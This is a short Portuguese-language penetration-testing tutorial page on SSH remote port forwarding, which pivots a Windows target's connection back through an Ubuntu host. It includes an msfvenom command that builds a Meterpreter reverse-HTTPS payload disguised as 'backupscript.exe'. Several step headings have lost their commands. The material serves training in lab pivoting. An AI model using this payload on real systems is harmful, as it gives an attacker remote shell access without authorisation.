Remote/Reverse Port Forwarding with SSH
Como pode ser visto na imagem abaixo, em nosso caso anterior, poderíamos fazer pivot no host Windows por meio do servidor Ubuntu.

Criando um Payload do Windows com msfvenom
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080Configurando e iniciando o multi/handler
Transferindo carga útil para o host Pivot
Iniciando o servidor Web Python3 no Pivot Host
Baixando Payload do Windows Target
Usando SSH -R
Após criar o encaminhamento de porta remota SSH, podemos executar o payload do alvo do Windows. Se o payload for executado conforme o esperado e tentar se conectar de volta ao nosso listener, podemos ver os logs do pivot no host do pivot.
Se tudo estiver configurado corretamente, receberemos um shell do Meterpreter dinamizado pelo servidor Ubuntu.
PreviousDynamic Port Forwarding with SSH and SOCKS TunnelingNextMeterpreter Tunneling & Port Forwarding
Last updated